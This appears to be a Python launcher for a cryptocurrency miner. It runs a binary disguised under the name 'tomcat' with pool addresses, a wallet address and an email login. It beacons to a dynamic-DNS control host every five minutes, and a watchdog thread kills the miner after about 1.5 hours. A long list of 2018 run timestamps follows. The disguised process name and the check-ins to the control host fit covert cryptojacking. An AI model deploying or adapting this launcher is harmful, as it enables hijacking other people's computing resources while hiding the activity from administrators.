import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:51:01.978817
#2018-02-17 17:38:03.823684
#2018-02-17 19:26:06.403477
#2018-02-17 21:17:04.676506
#2018-02-17 23:01:03.874130
#2018-02-18 00:49:01.527590
#2018-02-18 02:35:07.634000
#2018-02-18 04:23:05.746304
#2018-02-18 06:14:06.285010
#2018-02-18 08:04:01.460637
#2018-02-18 09:52:02.251818
#2018-02-18 11:39:03.752279
#2018-02-18 13:24:04.701479
#2018-02-18 15:14:05.446753
#2018-02-18 17:03:04.005269
#2018-02-18 18:50:01.337075
#2018-02-18 20:37:01.347732
#2018-02-18 22:22:07.395697
#2018-02-19 00:12:01.800952
#2018-02-19 01:58:03.537642
#2018-02-19 03:45:04.084756
#2018-02-19 05:29:05.046974
#2018-02-19 07:16:07.448648
#2018-02-19 09:04:02.218571
#2018-02-19 10:51:02.042137
#2018-02-19 12:39:05.510662
#2018-02-19 14:27:06.082301
#2018-02-19 16:16:05.373181
#2018-02-19 18:04:08.758570
#2018-02-19 19:52:01.639095
#2018-02-19 21:39:05.572456
#2018-02-19 23:27:06.286175
#2018-02-20 01:14:07.332736
#2018-02-20 03:06:02.042612
#2018-02-20 04:53:03.592910
#2018-02-20 06:36:04.822493
#2018-02-20 08:21:07.247114
#2018-02-20 10:07:05.617809
#2018-02-20 11:52:01.337902
#2018-02-20 13:41:05.506482
#2018-02-20 15:25:09.828644
#2018-02-20 17:12:05.695213
#2018-02-20 19:03:01.986896
#2018-02-20 20:51:06.877564
#2018-02-20 22:35:04.668634
#2018-02-21 00:18:07.565209
#2018-02-21 02:04:06.206416
#2018-02-21 03:52:07.772757
#2018-02-21 05:40:07.206972
#2018-02-21 07:29:04.085270
#2018-02-21 09:14:08.279883
#2018-02-21 11:04:07.571420
#2018-02-21 12:51:05.163596
#2018-02-21 14:40:08.530470
#2018-02-21 16:27:07.853776
#2018-02-21 18:17:07.504646
#2018-02-21 20:04:08.289832
#2018-02-21 21:53:05.316418
#2018-02-21 23:39:03.948972
#2018-02-22 01:28:02.117160
#2018-02-22 03:16:08.195307
#2018-02-22 05:03:03.943212
#2018-02-22 06:46:07.816345
#2018-02-22 08:35:08.129180
#2018-02-22 10:23:09.671082
#2018-02-22 12:09:05.996325
#2018-02-22 13:55:09.608936
#2018-02-22 15:42:07.015918
#2018-02-22 17:28:06.527625
#2018-02-22 19:17:06.830146
#2018-02-22 21:08:08.304483
#2018-02-22 22:52:08.114546
#2018-02-23 00:41:06.930655
#2018-02-23 02:27:07.088904
#2018-02-23 04:15:08.625760
#2018-02-23 06:02:08.160001
#2018-02-23 07:49:07.551939
#2018-02-23 10:09:01.545158
#2018-02-23 12:01:05.711003
#2018-02-23 13:49:05.088852
#2018-02-23 15:41:06.243900
#2018-02-23 17:28:05.851988
#2018-02-23 19:14:06.270628
#2018-02-23 20:58:04.893195
#2018-02-23 22:51:06.917146
#2018-02-24 00:42:04.635087
#2018-02-24 02:32:07.307101
#2018-02-24 04:25:01.692848
#2018-02-24 06:10:08.647145
#2018-02-24 07:58:01.718637
#2018-02-24 09:42:01.396876
#2018-02-24 11:37:01.908809
#2018-02-24 13:27:06.437708
#2018-02-24 15:16:01.825082
#2018-02-24 17:05:08.242276
#2018-02-24 18:56:01.773026
#2018-02-24 20:43:04.867973
#2018-02-24 22:56:07.118304
#2018-02-25 02:15:03.231726
#2018-02-25 05:48:02.061226
#2018-02-25 11:37:06.293283